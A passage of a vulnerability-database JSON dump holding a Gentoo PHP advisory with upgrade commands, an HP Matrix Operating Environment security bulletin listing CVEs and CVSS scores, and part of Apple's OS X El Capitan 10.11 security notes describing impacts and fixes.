"UNKNOWN", "packageName": "dev-lang/php", "arch": "all", "operator": "lt"}], "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker can possibly execute arbitrary code or create a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP 5.4 is now masked in Portage: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.5.33\"\n \n\nAll PHP 5.5 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.5.33\"\n \n\nAll PHP 5.6 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.6.19\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2016-06-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-4644", "CVE-2015-6834", "CVE-2015-1352", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4642", "CVE-2015-4148", "CVE-2015-4025", "CVE-2015-4021", "CVE-2015-6836", "CVE-2015-4026", "CVE-2015-6833", "CVE-2015-4147", "CVE-2015-6831", "CVE-2015-4022", "CVE-2015-6837", "CVE-2015-7803", "CVE-2015-1351", "CVE-2015-6835", "CVE-2013-6501", "CVE-2015-4643", "CVE-2015-0231", "CVE-2015-6832", "CVE-2015-6838", "CVE-2015-7804"], "modified": "2016-06-19T00:00:00", "id": "GLSA-201606-10", "href": "https://security.gentoo.org/glsa/201606-10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:01", "references": [], "description": "\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04774019\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04774019\r\nVersion: 1\r\n\r\nHPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2015-08-24\r\nLast Updated: 2015-08-24\r\n\r\nPotential Security Impact: Remote unauthorized modification, unauthorized\r\naccess, or unauthorized disclosure of information.\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP Matrix\r\nOperating Environment. The vulnerabilities could be exploited remotely\r\nresulting in unauthorized modification, unauthorized access, or unauthorized\r\ndisclosure of information.\r\n\r\nReferences:\r\n\r\nCVE-2010-5107\r\nCVE-2013-0248\r\nCVE-2014-0118\r\nCVE-2014-0226\r\nCVE-2014-0231\r\nCVE-2014-1692\r\nCVE-2014-3523\r\nCVE-2014-3569\r\nCVE-2014-3570\r\nCVE-2014-3571\r\nCVE-2014-3572\r\nCVE-2014-8142\r\nCVE-2014-8275\r\nCVE-2014-9427\r\nCVE-2014-9652\r\nCVE-2014-9653\r\nCVE-2014-9705\r\nCVE-2015-0204\r\nCVE-2015-0205\r\nCVE-2015-0206\r\nCVE-2015-0207\r\nCVE-2015-0208\r\nCVE-2015-0209\r\nCVE-2015-0231\r\nCVE-2015-0232\r\nCVE-2015-0273\r\nCVE-2015-0285\r\nCVE-2015-0286\r\nCVE-2015-0287\r\nCVE-2015-0288\r\nCVE-2015-0289\r\nCVE-2015-0290\r\nCVE-2015-0291\r\nCVE-2015-0292\r\nCVE-2015-0293\r\nCVE-2015-1787\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\nCVE-2015-2134\r\nCVE-2015-2139\r\nCVE-2015-2140\r\nCVE-2015-2301\r\nCVE-2015-2331\r\nCVE-2015-2348\r\nCVE-2015-2787\r\nCVE-2015-3113\r\nCVE-2015-5122\r\nCVE-2015-5123\r\nCVE-2015-5402\r\nCVE-2015-5403\r\nCVE-2015-5404\r\nCVE-2015-5405\r\nCVE-2015-5427\r\nCVE-2015-5428\r\nCVE-2015-5429\r\nCVE-2015-5430\r\nCVE-2015-5431\r\nCVE-2015-5432\r\nCVE-2015-5433\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Matrix Operating Environment impacted software components and versions:\r\n\r\nHP Systems Insight Manager (SIM) prior to version 7.5.0\r\nHP System Management Homepage (SMH) prior to version 7.5.0\r\nHP Version Control Agent (VCA) prior to version 7.5.0\r\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\r\nHP Insight Orchestration prior to version 7.5.0\r\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3\r\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\r\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\r\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\r\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\r\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\r\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\r\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\r\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\r\nCVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\r\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\r\nCVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\r\nCVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\r\nCVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\r\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\r\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\r\nCVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\r\nCVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\r\nCVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\nCVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\r\nCVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve the\r\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\r\n\r\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\r\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\r\nfrom the following location:\r\n\r\nhttp://www.hp.com/go/insightupdates\r\n\r\nChoose the orange Select button. This presents the HP Insight Management\r\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\r\nthe Software specification list. Fill out the rest of the form and submit it.\r\n\r\nHP has addressed these vulnerabilities for the affected software components\r\nbundled with the HP Matrix Operating Environment in the following HP Security\r\nBulletins.\r\n\r\nHP Matrix Operating Environment component\r\n HP Security Bulletin Number\r\n Security Bulletin Location\r\n\r\nHP Systems Insight Manager (SIM)\r\n HPSBMU03394\r\n HPSBMU03394\r\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU03380\r\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la\r\nng=en-us&cc=\r\n\r\nHP Version Control Agent (VCA)\r\n HPSBMU03397\r\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\r\n\r\nHP Version Control Repository Manager (VCRM)\r\n HPSBMU03396\r\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\r\n_na-c04765115\r\n\r\nHP Virtual Connect Enterprise Manager (VCEM) SDK\r\n HPSBMU03413\r\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\r\n_na-c04774021\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 August 2015 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2015 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-09-14T00:00:00", "title": "[security bulletin] HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:01", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-3113", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-1792", "CVE-2014-9427", "CVE-2015-5123", "CVE-2014-0231", "CVE-2014-3572", "CVE-2015-0206", "CVE-2015-1789", "CVE-2015-2134", "CVE-2015-0286", "CVE-2014-3571", "CVE-2015-2301", "CVE-2015-5433", "CVE-2015-5430", "CVE-2015-0288", "CVE-2015-5431", "CVE-2015-0285", "CVE-2015-0273", "CVE-2015-2331", "CVE-2015-5404", "CVE-2014-8142", "CVE-2015-0207", "CVE-2015-5402", "CVE-2015-2139", "CVE-2014-8275", "CVE-2015-0208", "CVE-2015-5428", "CVE-2014-3570", "CVE-2015-5427", "CVE-2015-5122", "CVE-2015-2140", "CVE-2010-5107", "CVE-2015-0293", "CVE-2014-1692", "CVE-2015-1788", "CVE-2014-3523", "CVE-2015-5429", "CVE-2015-0209", "CVE-2014-9653", "CVE-2015-5405", "CVE-2015-5432", "CVE-2014-9652", "CVE-2015-0204", "CVE-2013-0248", "CVE-2015-1790", "CVE-2014-0118", "CVE-2015-0291", "CVE-2015-0287", "CVE-2015-5403", "CVE-2015-0289", "CVE-2015-0292", "CVE-2015-0290", "CVE-2015-0205", "CVE-2015-0231", "CVE-2015-1787", "CVE-2014-3569", "CVE-2015-1791", "CVE-2014-0226"], "modified": "2015-09-14T00:00:00", "id": "SECURITYVULNS:DOC:32494", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32494", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:01", "references": [], "description": "\r\n\r\nAPPLE-SA-2015-09-30-3 OS X El Capitan 10.11\r\n\r\nOS X El Capitan 10.11 is now available and addresses the following:\r\n\r\nAddress Book\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local attacker may be able to inject arbitrary code to\r\nprocesses loading the Address Book framework\r\nDescription: An issue existed in Address Book framework's handling\r\nof an environment variable. This issue was addressed through improved\r\nenvironment variable handling.\r\nCVE-ID\r\nCVE-2015-5897 : Dan Bastone of Gotham Digital Science\r\n\r\nAirScan\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker with a privileged network position may be able\r\nto extract payload from eSCL packets sent over a secure connection\r\nDescription: An issue existed in the processing of eSCL packets.\r\nThis issue was addressed through improved validation checks.\r\nCVE-ID\r\nCVE-2015-5853 : an anonymous researcher\r\n\r\napache_mod_php\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in PHP\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.27, including one which may have led to remote code execution.\r\nThis issue was addressed by updating PHP to version 5.5.27.\r\nCVE-ID\r\nCVE-2014-9425\r\nCVE-2014-9427\r\nCVE-2014-9652\r\nCVE-2014-9705\r\nCVE-2014-9709\r\nCVE-2015-0231\r\nCVE-2015-0232\r\nCVE-2015-0235\r\nCVE-2015-0273\r\nCVE-2015-1351\r\nCVE-2015-1352\r\nCVE-2015-2301\r\nCVE-2015-2305\r\nCVE-2015-2331\r\nCVE-2015-2348\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3329\r\nCVE-2015-3330\r\n\r\nApple Online Store Kit\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious application may gain access to a user's keychain\r\nitems\r\nDescription: An issue existed in validation of access control lists\r\nfor iCloud keychain items. This issue was addressed through improved\r\naccess control list checks.\r\nCVE-ID\r\nCVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of\r\nIndiana University, Tongxin Li of Peking University, Tongxin Li of\r\nPeking University, Xiaolong Bai of Tsinghua University\r\n\r\nAppleEvents\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A user connected through screen sharing can send Apple\r\nEvents to a local user's session\r\nDescription: An issue existed with Apple Event filtering that\r\nallowed some users to send events to other users. This was addressed\r\nby improved Apple Event handling.\r\nCVE-ID\r\nCVE-2015-5849 : Jack Lawrence (@_jackhl)\r\n\r\nAudio\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Playing a malicious audio file may lead to an unexpected\r\napplication termination\r\nDescription: A memory corruption issue existed in the handling of\r\naudio files. This issue issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:\r\nProf. Taekyoung Kwon), Yonsei University, Seoul, Korea\r\n\r\nbash\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in bash\r\nDescription: Multiple vulnerabilities existed in bash versions prior\r\nto 3.2 patch level 57. These issues were addressed by updating bash\r\nversion 3.2 to patch level 57.\r\nCVE-ID\r\nCVE-2014-6277\r\nCVE-2014-7186\r\nCVE-2014-7187\r\n\r\nCertificate Trust Policy\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Update to the certificate trust policy\r\nDescription: The certificate trust policy was updated. The complete\r\nlist of certificates may be viewed at https://support.apple.com/en-\r\nus/HT202858.\r\n\r\nCFNetwork Cookies\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker in a privileged network position can track a\r\nuser's activity\r\nDescription: A cross-domain cookie issue existed in the handling of\r\ntop level domains. The issue was address through improved\r\nrestrictions of cookie creation.\r\nCVE-ID\r\nCVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\r\nUniversity\r\n\r\nCFNetwork FTPProtocol\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Malicious FTP servers may be able to cause the client to\r\nperform reconnaissance on other hosts\r\nDescription: An issue existed in the handling of FTP packets when\r\nusing the PASV command. This issue was resolved through improved\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5912 : Amit Klein\r\n\r\nCFNetwork HTTPProtocol\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A maliciously crafted URL may be able to bypass HSTS and\r\nleak sensitive data\r\nDescription: A URL parsing vulnerability existed in HSTS handling.\r\nThis issue was addressed through improved URL parsing.\r\nCVE-ID\r\nCVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\r\nUniversity\r\n\r\nCFNetwork HTTPProtocol\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious website may be able to track users in Safari\r\nprivate browsing mode\r\nDescription: An issue existed in the handling of HSTS state in\r\nSafari private browsing mode. This issue was addressed through\r\nimproved state handling.\r\nCVE-ID\r\nCVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd\r\n\r\nCFNetwork Proxies\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Connecting to a malicious web proxy may set malicious\r\ncookies for a website\r\nDescription: An issue existed in the handling of proxy connect\r\nresponses. This issue was addressed by removing the set-cookie header\r\nwhile parsing the connect response.\r\nCVE-ID\r\nCVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\r\nUniversity\r\n\r\nCFNetwork SSL\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker with a privileged network position may intercept\r\nSSL/TLS connections\r\nDescription: A certificate validation issue existed in NSURL when a\r\ncertificate changed. This issue was addressed through improved\r\ncertificate validation.\r\nCVE-ID\r\nCVE-2015-5824 : Timothy J. Wood of The Omni Group\r\n\r\nCFNetwork SSL\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker may be able to decrypt data protected by SSL\r\nDescription: There are known attacks on the confidentiality of RC4.\r\nAn attacker could force the use of RC4, even if the server preferred\r\nbetter ciphers, by blocking TLS 1.0 and higher connections until\r\nCFNetwork tried SSL 3.0, which only allows RC4. This issue was\r\naddressed by removing the fallback to SSL 3.0.\r\n\r\nCoreCrypto\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker may be able to determine a private key\r\nDescription: By observing many signing or decryption attempts, an\r\nattacker may have been able to determine the RSA private key. This\r\nissue was addressed using improved encryption algorithms.\r\n\r\nCoreText\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nDev Tools\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in dyld. This was\r\naddressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5876 : beist of grayhash\r\n\r\nDev Tools\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An application may be able to bypass code signing\r\nDescription: An issue existed with validation of the code signature\r\nof executables. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5839 : @PanguTeam\r\n\r\nDisk Images\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in DiskImages. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5847 : Filippo Bigarella, Luca Todesco\r\n\r\ndyld\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An application may be able to bypass code signing\r\nDescription: An issue existed with validation of the code signature\r\nof executables. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5839 : TaiG Jailbreak Team\r\n\r\nEFI\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious application can prevent some systems from\r\nbooting\r\nDescription: An issue existed with the addresses covered by the\r\nprotected range register. This issue was fixed by changing the\r\nprotected range.\r\nCVE-ID\r\nCVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore\r\n\r\nEFI\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious Apple Ethernet Thunderbolt adapter may be able\r\nto affect firmware flashing\r\nDescription: Apple Ethernet Thunderbolt adapters could modify the\r\nhost firmware if connected during an EFI update. This issue was\r\naddressed by not loading option ROMs during updates.\r\nCVE-ID\r\nCVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare\r\n\r\nFinder\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: The "Secure Empty Trash" feature may not securely delete\r\nfiles placed in the Trash\r\nDescription: An issue existed in guaranteeing secure deletion of\r\nTrash files on some systems, such as those with flash storage. This\r\nissue was addressed by removing the "Secure Empty Trash" option.\r\nCVE-ID\r\nCVE-2015-5901 : Apple\r\n\r\nGame Center\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious Game Center application may be able to access a\r\nplayer's email address\r\nDescription: An issue existed in Game Center in the handling of a\r\nplayer's email. This issue was addressed through improved access\r\nrestrictions.\r\nCVE-ID\r\nCVE-2015-5855 : Nasser Alnasser\r\n\r\nHeimdal\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker may be able to replay Kerberos credentials to\r\nthe SMB server\r\nDescription: An authentication issue existed in Kerberos\r\ncredentials. This issue was addressed through additional validation\r\nof credentials using a list of recently seen credentials.\r\nCVE-ID\r\nCVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu\r\nFan of Microsoft Corporation, China\r\n\r\nICU\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in ICU\r\nDescription: Multiple vulnerabilities existed in ICU versions prior\r\nto 53.1.0. These issues were addressed by updating ICU to version\r\n55.1.\r\nCVE-ID\r\nCVE-2014-8146\r\nCVE-2014-8147\r\nCVE-2015-5922\r\n\r\nInstall Framework Legacy\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to gain root privileges\r\nDescription: A restriction issue existed in the Install private\r\nframework containing a privileged executable. This issue was\r\naddressed by removing the executable.\r\nCVE-ID\r\nCVE-2015-5888 : Apple\r\n\r\nIntel Graphics Driver\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Multiple memory corruption issues existed in the Intel\r\nGraphics Driver. These issues were addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5830 : Yuki MIZUNO (@mzyy94)\r\nCVE-2015-5877 : Camillus Gerard Cai\r\n\r\nIOAudioFamily\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to determine kernel memory layout\r\nDescription: An issue existed in IOAudioFamily that led to the\r\ndisclosure of kernel memory content. This issue was addressed by\r\npermuting kernel pointers.\r\nCVE-ID\r\nCVE-2015-5864 : Luca Todesco\r\n\r\nIOGraphics\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: Multiple memory corruption issues existed in the\r\nkernel. These issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5871 : Ilja van Sprundel of IOActive\r\nCVE-2015-5872 : Ilja van Sprundel of IOActive\r\nCVE-2015-5873 : Ilja van Sprundel of IOActive\r\nCVE-2015-5890 : Ilja van Sprundel of IOActive\r\n\r\nIOGraphics\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in IOGraphics which could have led to\r\nthe disclosure of kernel memory layout. This issue was addressed\r\nthrough improved memory management.\r\nCVE-ID\r\nCVE-2015-5865 : Luca Todesco\r\n\r\nIOHIDFamily\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: Multiple memory corruption issues existed in\r\nIOHIDFamily. These issues were addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5866 : Apple\r\nCVE-2015-5867 : moony li of Trend Micro\r\n\r\nIOStorageFamily\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local attacker may be able to read kernel memory\r\nDescription: A memory initialization issue existed in the kernel.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5863 : Ilja van Sprundel of IOActive\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: Multiple memory corruption issues existed in the\r\nKernel. These issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team\r\nCVE-2015-5896 : Maxime Villard of 